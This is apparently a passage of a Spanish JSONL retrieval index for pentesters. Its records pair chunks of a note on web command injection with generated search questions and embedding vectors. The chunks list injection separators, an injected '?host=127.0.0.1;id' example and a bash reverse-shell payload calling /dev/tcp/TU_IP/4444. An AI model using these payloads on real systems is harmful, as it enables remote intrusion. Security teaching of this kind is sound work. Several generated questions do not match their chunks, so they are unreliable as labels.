0.02824, -0.04119, 0.03819, 0.05192, -0.02692, 0.05447, -0.00527, -0.04024, -0.02854, -0.06778, -0.03059, 0.0765, -0.00617, 0.03963, -0.03074, 0.01328, 0.00638, -0.06189, -0.0613, -0.09735, -0.03018, 0.02222, -0.07903, 0.06243, -0.00709, -0.02788, -0.01044, -0.00207, -0.01122, -0.01496, 0.03498, -0.04922, -0.01086, 0.03407, -0.10366, -0.05877, 0.05442, 0.00597, -0.01797, 0.01161, 0.03682, -0.00511, 0.02042, 0.02645, -0.02577, 0.00526, 0.03782, 0.00012, -0.03189, 0.04024, -0.03252, -0.00216, -0.06376, 0.0295, 0.01184, -0.07233, 0.05153, -0.03039, -0.01315, 0.05295, -0.04542, 0.04827, 0.03905, -0.04324, 0.05839, 0.0009, -0.04086, -0.06596, 0.02271, -0.0344, -0.02723, -0.01644, 0.00708, 0.04139, 0.05948, -0.02572, 0.05034, -0.01235, 0.01264, -0.0091, 0.02253, 0.0282, 0.01236, 0.01972, -0.0208, -0.01816, 0.09983, 0.00366, -0.01143, -0.00362, -0.03979, -0.01471, 0.00646, 0.04053, -0.00646, -0.03595, -0.04372, -0.09584, -0.12808, 0.00689, -0.04635, -0.05102, -0.01707, 0.05069, 0.0504, -0.03158, -0.01521, -0.00882]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Command injection\n\n> Un parΓ‘metro web acaba dentro de un comando del sistema β†’ ejecutas comandos. RCE directo, vector top del Hacking web.", "indexar": "quΓ© mΓ©todo es el mΓ‘s comΓΊn para lograr un RCE directo desde la web?", "v": [-0.15061, 0.10928, -0.11628, 0.00995, 0.0068, -0.02282, -0.00716, -0.00699, -0.04764, -0.0778, -0.13865, -0.07807, 0.03309, -0.10024, 0.13979, 0.07603, 0.09092, 0.03098, -0.05389, -0.07876, -0.03396, -0.21054, -0.05761, -0.0442, -0.01934, -0.02385, 0.06962, -0.03105, -0.06487, 0.01844, 0.05012, 0.09936, -0.01801, 0.00315, -0.07193, -0.05137, 0.11625, 0.08428, -0.09506, -0.01409, -0.15499, -0.14113, -0.1999, 0.08751, -0.01368, -0.05632, 0.04068, 0.00224, 0.0161, -0.03442, -0.0241, 0.0533, -0.10515, -0.03415, -0.08969, -0.01157, -0.0276, -0.04887, 0.00306, -0.10414, 0.02136, 0.01101, 0.01441, -0.05463, 0.02456, -0.05792, 0.10395, -0.00482, -0.07942, 0.0078, -0.04341, -0.05781, -0.01768, 0.01744, 0.10298, -0.04929, -0.01832, 0.08026, 0.00948, -0.15002, 0.05875, -0.06973, -0.05857, -0.0216, -0.05201, -0.02864, 0.14701, -0.13329, -0.0535, -0.07951, -0.01439, -0.03203, -0.00945, -0.03972, 0.02992, -0.12979, 0.09163, -0.00164, -0.03138, -0.05619, -0.01027, -0.03759, -0.09863, 0.06263, 0.03209, 0.01978, 0.00296, -0.01318, -0.12972, -0.06538, -0.03763, -0.02295, -0.08524, 0.01503, -0.07602, 0.04912, -0.02478, 0.02353, -0.14829, -0.06143, -0.10264, 0.01863, -0.05265, -0.02526, 0.03516, -0.02012, 0.05872, 0.05206, -0.04245, 0.00954, -0.10809, 0.03987, -0.01454, -0.03834, 0.05734, 0.09863, -0.01042, -0.07209, -0.00515, -0.00496, 0.05692, 0.02711, -0.03189, -0.07605, 0.05218, -0.12755, 0.0981, -0.13959, -0.05195, -0.03909, -0.0124, 0.02175, -0.05614, 0.02008, -0.00914, -0.02854, 0.00113, -0.0772, -0.04488, 0.12287, -0.06733, -0.01225, 0.00818, -0.01581, -0.07097, -0.0561, -0.12845, -0.0368, 0.02371, 0.0494, 0.01804, 0.10394, -0.00333, -0.07328, 0.00932, 0.07516, 0.03101, -0.11148, 0.03748, -0.00838, -0.03727, 0.05755, -0.03483, 0.00896, 0.0042, -0.00502, 0.05107, 0.0325, 0.00099, 0.0758, 0.03949, 0.00217, 0.00294, 0.01978, -0.02052, 0.02148, -0.06242, -0.05661, 0.02879, -0.00761, -0.1114, -0.04065, 0.09655, -0.01999, 0.00472, -0.05371, -0.06655, -0.01362, 0.006, 0.05714, -0.00841, -0.04271, 0.07252, -0.09509, 0.02313, 0.00251, -0.02379, -0.05792, -0.00873, 0.02909, 0.03203, -0.00229, 0.00121, -0.02465, -0.01037, 0.04014, 0.00465, 0.034, 0.06107, 0.01768, -0.01029, -0.08236, 0.03003, -0.02096, 0.01245, 0.02846, 0.02492, -0.01848, -0.06441, -0.03137, 0.04432, 0.05687, 0.00744, 0.00242, 0.03381, -0.02957, -0.06558, 0.03464, 0.07376, -0.08079, -0.04279, -0.00386, 0.01077, -0.0419, -0.04817, -0.06656]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde aparece\nFunciones que \"hacen algo\" con tu input: `ping`, `nslookup`, convertir imΓ‘genes, export, backup, \"test connection\".", "indexar": "quΓ© programas puedo usar para hacer pings o probar conexiones desde la terminal?", "v": [0.00173, 0.09219, -0.15918, -0.23233, 0.06208, -0.05389, -0.00619, -0.03157, -0.07552, -0.01083, -0.14181, 0.08944, 0.0493, -0.03512, -0.06786, -0.00544, 0.03405, -0.03289, 0.20066, -0.10135, 0.00045, 0.02667, -0.1634, -0.0476, 0.03098, 0.09388, 0.06686, -0.10293, -0.06334, -0.0869, -0.06849, -0.04357, 0.19783, -0.00375, -0.16495, 0.04734, 0.06267, 0.07035, 0.14246, 0.05523, -0.00472, 0.0234, -0.09482, 0.04858, 0.12756, -0.01713, 0.06948, -0.0536, 0.00243, -0.0877, -0.06739, -0.0294, -0.1137, -0.00658, -0.00783, -0.05318, 0.05338, -0.18182, 0.04027, 0.01109, -0.01989, 0.02969, 0.05486, 0.11098, 0.05411, -0.0718, -0.00267, 0.02923, -0.13806, 0.09294, -0.04494, 0.09967, 0.01328, 0.04485, 0.09544, 0.0516, 0.00357, -0.03702, 0.13699, 0.00078, -0.05668, -0.01178, -0.02762, 0.00037, -0.05371, -0.0863, -0.04566, 0.03025, 0.0335, -0.05013, 0.12276, 0.02232, -7e-05, 0.05076, 0.03629, -0.07144, -0.02672, -0.00402, 0.04528, 0.01709, 0.09543, 0.04518, -0.08185, 0.17596, -0.06939, -0.07511, 0.06841, -0.03781, 0.00328, -0.00489, 0.0134, -0.02057, -0.02224, -0.01232, -0.12013, -0.01537, -0.03274, -0.04305, -0.08601, -0.04642, -0.01788, -0.03126, -0.0244, 0.02954, 0.07425, 0.00603, 0.05854, 0.08683, 0.02152, 0.06286, 0.06526, -0.04379, 0.00483, -0.06419, -0.05163, -0.05315, 0.1013, -0.1335, 0.02326, -0.01672, 0.01769, 0.05979, -0.02987, 0.03213, 0.0095, 0.08429, -0.08975, 0.03012, -0.03684, -0.02026, 0.05031, -0.04598, -0.08499, -0.00904, -0.03812, 0.01546, 0.05865, -0.0068, -0.05817, 0.08837, -0.05636, -0.02351, -0.05639, 0.01573, 0.09751, -0.04661, -0.07433, 0.03668, 0.02298, 0.08704, 0.03021, 0.05826, 0.00142, -0.05862, 0.02619, 0.01744, -0.03649, -0.01988, -0.00756, -0.02638, -0.03511, 0.00658, 0.01958, -0.05049, 0.04144, -0.02239, 0.00949, 0.0546, 0.06495, 0.06368, -0.0295, 0.08922, 0.03642, 0.0777, 0.03367, -0.006, 0.05584, -0.06868, -0.01097, -0.03122, -0.03671, 0.0125, -0.01439, -0.04178, 0.08148, 0.03284, -0.09659, 0.00242, 0.04858, 0.06945, 0.04779, 0.02235, 0.05741, -0.0138, -0.03554, -0.00883, -0.05759, 0.03691, 0.00235, 0.02835, -0.01043, -0.03779, -0.02232, 0.06668, 0.06367, -0.02358, 0.00699, 0.02791, -0.02766, -0.01064, 0.03404, 0.00154, -0.00934, -0.02616, 0.00074, -0.05784, 6e-05, -0.00681, -0.01888, -0.05112, -0.0365, 0.05521, -0.00658, 0.00296, -0.01582, -0.0182, -0.05499, 0.01765, -0.04383, -0.00594, -0.03174, -0.007, 0.07155, -0.00104, -0.0231, 0.0529]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde aparece\nFunciones que \"hacen algo\" con tu input: `ping`, `nslookup`, convertir imΓ‘genes, export, backup, \"test connection\".", "indexar": "con quΓ© herramientas puedo convertir imΓ‘genes y exportar archivos fΓ‘cilmente?", "v": [0.06428, 0.07628, -0.11373, -0.15643, -0.02434, -0.06262, 0.01079, 0.00436, -0.08575, -0.18437, -0.15329, -0.08407, -0.04208, -0.0067, 0.07977, 0.05265, 0.11987, -0.09273, 0.04815, -0.01502, 0.07666, 0.03034, -0.12913, -0.1275, -0.0299, -0.03869, -0.04522, 0.08425, -0.17419, 0.04025, -0.04601, 0.09762, 0.13936, 0.00222, -0.08787, -0.02236, 0.05588, 0.0754, -0.05955, 0.01748, 0.05596, 0.04523, -0.05844, 0.05917, -0.02918, -0.08552, -0.00073, -0.05192, -0.00305, -0.02859, 0.05267, -0.10191, -0.0743, 0.03488, -0.02493, -0.14252, 0.14228, -0.08248, 0.06322, 0.00531, 0.0218, 0.16616, -0.02143, 0.0413, -0.04832, 0.05074, -0.11704, -0.03885, -0.16371, 0.0438, -0.00042, 0.10536, 0.07789, 0.02812, -0.04467, -0.03389, -0.05245, -0.04885, -0.11345, -0.02473, 0.05298, -0.10782, -0.01838, -0.00629, -0.01714, -0.10801, -0.02696, -0.00099, 0.07928, -0.15231, 0.02848, -0.03923, 0.05732, -0.04647, 0.03953, 0.05511, 0.0205, -0.01039, -0.01056, -0.05273, -0.04358, 0.01094, -0.05879, 0.13494, 0.01584, 0.048, 0.06281, -0.01465, -0.09278, 0.01692, 0.04283, 0.05062, -0.00353, 0.01935, -0.12447, 0.00509, -0.06088, -0.10404, -0.03062, -0.02106, 0.01855, -0.03911, 0.0338, -0.0008, 0.01623, -0.05431, -0.04295, 0.11299, -0.11542, -0.01359, -0.05015, 0.01225, -0.03832, -0.02035, -0.05415, -0.00098, 0.14196, -0.12569, -0.04777, -0.16091, -0.01987, 0.00086, -0.00221, -0.10323, 0.05371, 0.03776, 0.03481, -0.05107, -0.06545, -0.05592, 0.02429, -0.06226, 0.0436, -0.02767, -0.00213, 0.0451, -0.0372, -0.06717, -0.06094, -0.0161, -0.10407, 0.06769, 0.01116, 0.00703, -0.05391, -0.03841, -0.01388, 0.02504, 0.01163, -0.01739, 0.03615, 0.01985, -0.01378, -0.02643, 0.05688, 0.07089, -0.03954, -0.08656, -0.01761, -0.0378, -0.01376, 0.04343, -0.02866, 0.00733, 0.01132, -0.01824, 0.03136, 0.02708, -0.02587, 0.03928, -0.03684, 0.0648, 0.00615, -0.09032, 0.04194, -0.01915, -0.06107, 0.03658, -0.00178, -0.05223, -0.00877, -0.0537, 0.01418, -0.007, 0.02822, 0.03627, -0.08271, 0.04388, -0.04326, -0.0307, -0.01731, 0.04625, 0.08772, -0.06921, 0.00127, 0.02347, -0.06461, 0.00528, -0.03259, 0.00134, 0.02402, 0.05374, 0.0987, 0.00218, 0.04025, 0.06612, -0.03676, 0.04328, -0.03225, -0.02217, -0.03066, 0.0722, -0.04116, 0.00938, 0.01145, -0.03607, -0.03381, -0.03732, -0.02239, -0.03326, 0.03173, 0.00165, -0.03825, 0.01561, -0.06965, -0.003, 0.0013, -0.03509, 0.07968, -0.09892, 0.00477, 0.09841, 0.07889, 0.00106, 0.00577, -0.01195]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde aparece\nFunciones que \"hacen algo\" con tu input: `ping`, `nslookup`, convertir imΓ‘genes, export, backup, \"test connection\".", "indexar": "ΒΏhay alguna alternativa libre a nslookup para verificar nombres de dominio?", "v": [-0.0975, 0.13868, -0.15173, -0.0394, -0.10258, -0.04811, -0.00963, -0.09064, -0.16981, -0.03809, 0.07159, -0.28212, -0.00698, -0.11554, 0.06977, -0.02572, 0.11757, -0.0592, 0.09785, -0.00018, -0.0534, -0.09505, -0.1602, -0.03016, -0.04084, -0.13782, -0.08695, -0.06226, 0.01736, 0.05148, -0.00026, -0.1004, -0.01324, 0.01459, -0.0718, 0.07369, 0.22033, -0.03037, 0.18073, 0.08511, 0.03337, -0.03895, -0.03027, 0.06442, -0.05529, -0.06456, -0.18885, 0.00148, 0.01882, -0.15263, 0.07993, 0.02517, -0.08705, 0.04776, -0.02672, -0.00703, 0.03566, -0.00302, -0.07689, -0.01073, -0.12257, -0.06271, 0.04875, 0.02988, -0.07414, -0.04353, -0.03127, 0.00953, -0.01144, 0.03104, 0.0142, -0.03423, 0.05158, -0.01641, -0.05579, -0.05548, 0.13244, -0.11351, 0.06707, 0.02509, 0.06207, -0.02346, -0.03122, -0.00336, -0.13276, -0.05611, -0.05824, -0.12399, 0.02685, 0.01471, 0.06346, 0.12743, -0.03593, 0.11737, -0.08605, 0.05363, -0.03004, 0.03746, -0.09495, 0.04774, 0.11789, 0.08792, -0.04032, -0.01078, 0.01911, 0.04921, -0.04891, -0.00987, -0.05945, 0.02024, 0.03002, 0.0209, -0.1252, -0.02795, 0.02227, 0.00155, -0.06678, -0.03259, 0.01288, -0.02402, -0.08732, -0.0331, 0.00486, -0.0438, 0.00713, -0.00873, 0.06071, -0.03052, -0.04963, -0.00286, 0.0312, -0.04967, -0.06057, -0.10483, -0.03249, -0.03741, 0.04867, 0.01131, 0.05852, 0.00895, -0.0621, 0.04155, -0.02027, -0.01937, -0.00168, -0.00574, 0.0366, -0.06698, -0.0312, -0.00039, -0.08059, -0.01682, -0.08017, 0.16178, -0.0138, 0.05001, -0.05604, 0.02117, -0.00688, 0.02974, -0.01126, -0.01053, -0.0542, 0.01228, -0.05682, 0.01884, 0.08558, -0.03468, -0.01403, 0.0312, 0.0367, 0.03935, 0.01724, -0.04445, 0.0427, -0.03312, 0.02446, -0.03558, -0.03037, -0.01812, -0.03481, 0.01552, -0.05063, 0.04516, -0.00611, 0.02299, 0.03724, 0.02761, 0.00187, 0.00365, 0.01438, 0.03226, -0.0986, -0.06484, -0.01054, 0.07285, 0.07549, -0.05668, -0.02825, 0.00419, -0.0301, -0.0542, 0.01016, -0.00962, -0.03931, -0.02501, 0.01728, 0.00182, 0.05371, -0.00201, -0.0161, -0.01461, 0.01604, 0.00544, -0.09055, -0.0516, -0.05472, -0.00077, -0.04341, -0.05698, -0.04597, 0.00816, -0.01321, 0.03995, 0.02866, 0.03191, 0.04801, -0.00049, -0.01436, 0.03461, -0.00966, 0.0153, -0.00355, -0.00756, 0.03321, -0.03625, 0.00829, 0.06976, 0.03718, 0.03842, -0.01186, 0.04225, 0.05233, 0.00911, -0.0543, 0.00871, -0.0643, -0.01414, -0.06361, 0.00552, -0.00918, -4e-05, -0.04529, 0.0436, 0.02455, 0.01758]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Separadores a probar (en Burp Repeater e Intruder)\n```\n;id ejecuta tras el comando\n| id pipe\n& id / && id encadenado\n`id` $(id) sustituciΓ³n de comando\n%0a id newline (a veces evade filtros)\n```\nEjemplo: `?host=127.0.0.1;id` β†’ si ves `uid=...` en la respuesta, tienes RCE.", "indexar": "quΓ© herramienta sirve para probar separadores de comandos en Burp Repeater e Intruder", "v": [0.06994, -0.02124, -0.19596, -0.1723, 0.09168, -0.06527, 0.1624, -0.05147, -0.03577, -0.15405, -0.16479, 0.10891, 0.10003, -0.17776, -0.04185, -0.01386, -0.03462, -0.0638, 0.00429, 0.00652, 0.14766, 0.08076, -0.09534, -0.01095, -0.00731, 0.01793, -0.00868, -0.04468, -0.13808, 0.04753, -0.08956, 0.00925, 0.09506, -0.10214, -0.2135, -0.07652, -0.01947, -0.03977, -0.06765, 0.13776, -0.04323, 0.03918, -0.08756, 0.07883, -0.02075, -0.01596, -0.06852, 0.08181, 0.01081, 0.06342, -0.05002, -0.11232, -0.08414, 0.03801, -0.07183, -0.10227, 0.13898, -0.02125, 0.00848, -0.03047, -0.05196, -0.0341, -0.03035, 0.01589, -0.02874, -0.12603, -0.08257, -0.14605, -0.03562, 0.04129, -0.13535, 0.06557, 0.00163, -0.00618, -0.01998, 0.01397, -0.04683, 0.05359, 0.16745, -0.02505, 0.06552, 0.00464, -0.08864, -0.02557, -0.01011, -0.13761, 0.02125, -0.05532, 0.00421, -0.09818, -0.00099, 0.04794, 0.03998, 0.05144, 0.08778, -0.00577, 0.10617, 0.00785, 0.01818, -0.02784, 0.16932, -0.0399, -0.16881, 0.09831, -0.00573, 0.04879, -0.00199, -0.01011, 0.01689, -0.02908, 0.07391, -0.06437, -0.08697, -0.00154, -0.08857, 0.00602, -0.0847, -0.05848, -0.03462, -0.03931, -0.03052, 0.07887, -0.02988, 0.05616, 0.03732, -0.00793, -0.02844, 0.02028, 0.03127, -0.00115, -0.01962, -0.03503, 0.00174, -0.02327, -0.0367, 0.02279, -0.00762, -0.05587, -0.08615, -0.08448, -0.01424, 0.03375, -0.00466, -0.05166, -0.00446, 0.03612, 0.0617, -0.02134, -0.03853, -0.03493, 0.06301, -0.02701, -0.0143, 0.05382, -0.05828, -0.09881, -0.04182, -0.036, -0.06192, 0.09368, -0.05819, -0.01757, -0.0194, 0.02725, 0.08838, -0.03072, -0.01841, -0.02118, 0.04959, 0.05493, 0.04773, 0.00528, 0.05235, -0.02898, -0.00604, -0.03258, -0.01811, -0.012, -0.01519, -0.05186, 0.00187, 0.05958, -0.04638, -0.02961, 0.00777, -0.0814, -0.02141, 0.02659, -0.01304, 0.00894, 0.01155, 0.04829, 0.02194, -0.08357, 0.01446, -0.00193, 0.02989, -0.05959, -0.00826, -0.02349, -0.0822, -0.01381, -0.02201, -0.08081, 0.05322, 0.01435, -0.00421, 0.04264, 0.03795, 0.00198, 0.05269, 0.02107, 0.04486, -0.00647, -0.05287, -0.02373, 0.05245, 0.04799, -0.06159, 0.00282, 0.03927, 0.0471, 0.02867, -0.00387, 0.0203, 0.0498, 0.02016, -0.03518, 0.01938, 0.00249, 0.03394, -0.01525, -0.01262, -0.03211, 0.0089, -0.00606, 0.01132, 0.00041, -0.02365, -0.03851, -0.00412, 0.01435, 0.01732, -0.0709, -0.00767, -0.07826, -0.04956, -0.01169, -0.04924, -0.03081, -0.04304, 0.00888, 0.00123, -0.03633, -0.02688, -0.03261]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Separadores a probar (en Burp Repeater e Intruder)\n```\n;id ejecuta tras el comando\n| id pipe\n& id / && id encadenado\n`id` $(id) sustituciΓ³n de comando\n%0a id newline (a veces evade filtros)\n```\nEjemplo: `?host=127.0.0.1;id` β†’ si ves `uid=...` en la respuesta, tienes RCE.", "indexar": "cΓ³mo puedo ejecutar comandos encadenados usando el pipe o sustituciΓ³n de variables", "v": [0.18879, 0.08873, -0.12233, -0.0354, 0.06719, -0.05009, 0.09477, -0.10742, -0.08377, -0.06519, -0.07413, -0.08987, 0.00048, -0.08575, -0.05408, 0.0242, 0.14435, -0.09669, 0.02498, -0.0591, 0.07758, -0.12476, 0.01423, 0.01608, -0.04059, 0.19689, 0.04037, -0.02243, -0.16495, -0.09534, -0.01182, 0.08249, 0.0844, -0.03974, -0.1878, 0.06778, -0.09003, -0.03867, 0.03934, 0.12732, -0.04447, -0.0238, -0.16185, -0.06625, -0.02758, -0.03344, -0.02049, 0.04798, 0.05816, -0.07983, 0.02328, -0.01906, -0.09656, -0.05934, 0.02343, -0.00582, 0.19355, -0.12494, -0.06792, -0.01608, -0.03196, -0.07305, 0.14925, 0.14938, 0.07527, 0.02481, -0.02241, -0.14312, -0.0164, 0.10459, -0.06312, 0.07682, -0.07713, 0.01892, 0.06946, -0.00786, 0.01299, -0.05812, 0.08702, -0.01318, -0.0824, 0.01905, -0.10092, 0.08179, -0.02611, -0.03709, -0.05033, -0.06475, 0.03159, -0.03795, 0.02434, -0.04232, 0.00842, 0.14577, 0.00075, 0.01414, -0.02189, 0.02883, 0.04698, 0.0201, 0.05209, 0.02528, -0.10807, 0.13922, 0.03628, 0.01562, -0.00261, -0.025, -0.04629, -0.01907, 0.05262, -0.01339, -0.03248, -0.1117, -0.00758, -0.02802, 0.057, -0.07037, -0.02215, -0.03926, -0.0865, -0.00821, -0.03381, 0.03265, -0.03134, 0.00106, -0.00224, 0.01991, 0.03178, 0.03724, -0.03796, 0.02878, 0.03999, -0.12395, -0.07937, 0.06443, 0.09237, -0.03226, -0.1024, -0.11695, -0.00987, 0.02848, 0.05901, 0.04524, 0.04726, -0.01972, 0.02051, -0.07708, -0.07252, 0.02922, 0.05203, 0.03388, -0.0817, 0.09382, -0.0482, -0.07236, -0.02711, -0.03282, -0.0322, -0.00278, 0.00619, -0.0447, -0.06784, -0.02438, 0.04654, -0.04455, 0.01504, -0.00673, 0.03117, 0.05862, -0.01655, 0.06017, -0.00358, -0.03482, 0.00476, -0.05167, -0.01503, -0.04978, 0.0055, 0.00524, -0.0198, 0.05298, -0.08234, -0.02448, 0.03135, -0.01336, -0.00357, -0.01079, -0.03056, -0.02134, 0.00424, 0.02816, 0.00327, -0.08766, 0.02708, -0.02081, 0.05672, -0.0167, -0.11104, -0.05794, -0.03628, 0.03381, 0.08914, -0.08934, 0.03465, 0.0094, -0.03874, 0.00219, -0.01239, -0.03909, 0.07001, -0.0149, 0.07097, 0.00335, -0.05629, -0.07145, 9e-05, 0.00302, 0.00881, -0.02917, -0.01448, 0.0136, 0.06329, -0.0103, -0.02955, 0.02186, -0.05288, -0.0386, -0.0072, 0.05548, -0.01593, 0.0377, 0.00909, 0.00042, 0.05863, -0.02478, -0.05991, -0.01198, 0.00753, -0.04892, -0.00644, 0.04131, -0.03009, -0.04412, -0.01697, -0.04086, -0.10124, -0.01789, -0.0144, -0.02948, -0.01112, 0.01976, -0.00101, -0.05297, -0.00314, -0.04038]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\n```\n?host=127.0.0.1; bash -c 'bash -i >& /dev/tcp/TU_IP/4444 0>&1'\n```\nβ†’ recΓ­bela en tu listener (Reverse shell, ojo al Egress filtering).", "indexar": "cΓ³mo crear un reverse shell en bash?", "v": [0.04747, -0.03798, 0.02966, 0.02533, -0.08569, -0.1027, -0.12999, -0.06855, 0.02736, -0.00459, -0.2094, -0.01751, -0.02506, -0.06137, 0.0475, 0.015, -0.16829, 0.00208, 0.02019, -0.01887, 0.02084, -0.01914, -0.05777, -0.01154, -0.06356, -0.04507, -0.03708, 0.06782, -0.10833, 0.02094, -0.09071, -0.14853, 0.05059, 0.04215, -0.03753, 0.08861, 0.01611, -0.07541, -0.0559, 0.16624, -0.08198, 0.01978, -0.07654, 0.2342, 0.09942, -0.09212, 0.08082, -0.00262, 0.00403, -0.01297, -0.04046, -0.03987, -0.2549, 0.11384, 0.13273, -0.04016, 0.09392, -0.18875, -0.02119, -0.05432, -0.17034, 0.06546, -0.0203, 0.09523, 0.04024, -0.03014, -0.094, -0.16303, -0.05255, 0.04921, -0.01463, -0.00914, -0.03984, 0.06297, -0.00845, 0.0306, -0.00065, 0.02323, -0.06425, -0.01514, -0.13483, -0.08248, -0.00699, 0.03457, 0.01106, -0.05797, -0.03952, 0.00444, -0.00772, 0.01614, -0.00138, 0.00793, 0.00628, 0.03609, -0.01726, -0.07227, 0.00767, -0.02466, -0.16414, 0.04732, -0.10798, -0.06799, -0.01336, 0.12309, 0.03064, -0.00415, -0.0443, 0.01227, -0.01868, 0.11402, 0.04544, -0.05829, 0.07157, 0.02303, 0.00385, -0.05258, -0.03857, 0.01211, 0.04345, 0.01084, 0.03437, -0.02, -0.0238, -0.002, -0.06686, 0.03688, -0.04507, 0.09012, -0.04201, 0.02856, 0.02031, -0.02536, 0.03031, 0.01828, -0.03058, 0.12092, 0.03279, 0.03956, -0.06685, -0.07486, 0.01055, 0.13144, -0.04266, -0.06045, -0.02308, -0.04801, 0.0582, -0.11754, -0.09075, 0.04545, -0.01885, 0.06727, -0.01434, -0.01966, -0.11323, -0.04395, -0.00933, -0.05537, -0.01278, -0.0226, -0.01453, 0.04603, -0.03947, 0.03524, 0.02347, -0.03717, -0.09981, 0.01606, 0.01878, 0.02228, -0.038, 0.01125, 0.06177, -0.00706, 0.07556, 0.03242, 0.02974, -0.00682, 1e-05, -0.01447, 0.10561, -0.04157, -0.01057, -0.06845, 0.00564, -0.00944, 0.0906, 0.0881, -0.01172, 0.04877, -0.03778, 0.06199, -0.00197, -0.02357, -0.00579, 0.03898, 0.05725, -0.10389, 0.04841, 0.06175, 0.01258, 0.03572, 0.07486, -0.0618, -0.02546, -0.02991, -0.10755, -0.00881, -0.02547, -0.01359, 0.02199, 0.01943, -0.00309, 0.11378, -0.001, 0.0052, 0.01399, -0.04007, 0.00391, 0.01106, -0.02849, -0.01547, -0.02275, 0.023, -0.02144, -0.03948, 0.02814, -0.00206, -0.03371, 0.0039, 0.00152, -0.01458, 0.01835, 0.02551, -0.0586, 0.01243, -0.01502, -0.03456, 0.04855, 0.00271, 0.00706, 0.05357, -0.01589, -0.04296, 0.01784, -0.00623, -0.00339, 0.00767, -0.05323, -0.00222, -0.0091, -0.02055, 0.00382, -0.01428, -0.02502, -0.06091]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\n```\n?host=127.0.0.1; bash -c 'bash -i >& /dev/tcp/TU_IP/4444 0>&1'\n```\nβ†’ recΓ­bela en tu listener (Reverse shell, ojo al Egress filtering).", "indexar": "quΓ© comando ejecuta un reverse shell a travΓ©s de puerto 4444?", "v": [0.12632, -0.02, -0.11084, -0.02418, 0.06664, -0.05499, 0.13908, -0.04215, -0.04369, -0.05508, -0.14184, 0.0936, 0.04277, -0.08839, 0.03035, -0.02275, -0.01244, 0.01903, 0.00659, -0.08816, -0.0398, -0.02302, 0.06531, -0.13771, -0.0124, 0.11647, 0.02791, 0.08529, -0.11221, -0.1046, -0.01164, 0.01899, 0.10052, -0.0566, 0.02488, 0.06582, -0.06345, 0.01368, -0.02155, 0.23841, -0.06781, 0.08965, -0.16462, 0.08919, 0.12436, -0.07326, 0.03737, -0.07259, 0.06767, -0.01478, -0.04212, -0.01958, -0.15239, 0.01673, 0.0211, -0.01487, 0.10637, -0.03802, 0.04645, -0.05424, -0.09384, -0.11417, 0.0031, 0.0679, 0.03296, -0.07303, -0.03862, -0.11404, -0.0473, 0.00671, -0.03436, 0.05952, -0.02473, 0.13321, -0.01105, -0.09959, -0.00301, 0.02127, 0.01319, 0.00016, -0.0842, -0.04599, -0.09263, 0.01085, -0.02909, -0.0504, -0.14024, -0.08157, 0.01427, -0.04583, 0.0657, -0.0185, 0.00658, 0.09814, 0.00034, 0.01248, -0.00964, 0.04014, 0.00577, 0.04218, 0.07897, -0.00621, -0.067, 0.10129, 0.07122, 0.07909, -0.09673, -0.05444, 0.05428, 0.0972, 0.0085, -0.09311, 0.07609, -0.03819, 0.01118, -0.09994, -0.08817, -0.07653, 0.05271, -0.044, -0.09522, 0.00881, 0.00371, 0.04671, -0.00042, 0.03634, -0.0664, 0.05753, 0.07816, -0.05174, 0.0031, -0.01917, 0.03372, -0.05267, -0.05761, 0.11272, 0.06085, -0.05699, -0.04629, -0.10849, 0.02653, 0.07375, -0.00706, -0.00754, 0.08982, -0.02906, 0.04235, -0.09188, -0.05682, 0.05709, 0.0536, 0.09587, -0.07467, 0.04277, -0.04587, -0.02925, 0.01899, -0.04802, -0.03254, 0.0242, -0.02023, 0.00034, -0.06298, 0.05783, 0.01464, -0.03947, -0.09976, -0.00554, 0.01752, 0.01312, -0.04833, 0.0843, -0.02255, -0.02682, 0.00935, -0.07097, -0.06049, -0.00653, -0.00876, 0.02019, -0.03618, 0.03814, -0.04538, -0.10871, -0.06545, -0.03196, 0.00971, -0.01061, -0.00668, 0.11011, 0.07664, 0.04208, -0.0641, -0.02801, -0.06455, 0.07318, 0.01184, -0.04675, 0.00534, 0.00048, -0.02758, 0.06569, 0.05718, -0.08589, 0.00345, 0.02701, -0.09336, 0.07355, -0.05788, 0.0561, 0.00655, -0.00808, 0.06104, 0.03859, -0.05353, -0.00336, 0.04744, -0.00588, 0.00541, 0.08355, 0.00147, -0.00552, 0.06177, 0.0093, -0.00208, 0.02991, 0.03272, 0.01427, 0.0608, 0.00319, -0.03564, 0.03783, -0.00232, -0.02218, 0.00079, 0.02757, -0.00787, -0.01993, 0.00145, -0.06296, 0.08175, 0.08894, -0.08603, -0.10823, 0.01777, -0.04227, -0.08288, 0.06374, 0.00747, 0.01201, -0.04598, 0.06142, 0.02798, -0.04224, -0.01883, -0.06963]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\n```\n?host=127.0.0.1; bash -c 'bash -i >& /dev/tcp/TU_IP/4444 